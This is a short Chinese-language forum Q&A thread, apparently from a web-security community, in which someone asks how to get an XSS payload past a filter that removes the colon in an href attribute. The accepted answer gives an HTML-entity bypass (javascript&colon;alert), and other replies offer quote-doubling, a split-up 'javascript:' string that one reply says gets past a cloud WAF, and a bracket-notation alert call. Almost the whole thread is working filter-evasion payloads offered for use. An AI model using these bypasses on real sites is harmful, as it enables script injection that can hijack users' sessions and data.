75 XSS的herf处冒号被过滤,可以绕过吗?

请先 登录 后评论

最佳答案 2022-09-20 09:10

使用:实体化:进行替换(自行去掉斜杠)

<a href=javas\cript\&colon;ale\rt(2)>1</a>


请先 登录 后评论

其它 3 个回答

afei00123

你指的过滤是被删除还是转义了;

删除的话可以考虑双写引号试试:'"payload"',

还可以考虑不带引号的payload,已发就被云盾拦截了,payload:

j| a| v| a s c r i p t :

prompt| ( 123 ) //

请先 登录 后评论
浪飒sec

herf后面放超链接啊。带冒号是http://这个吧,不加也可以啊

请先 登录 后评论
我网神的

window['al\ert'](1);

请先 登录 后评论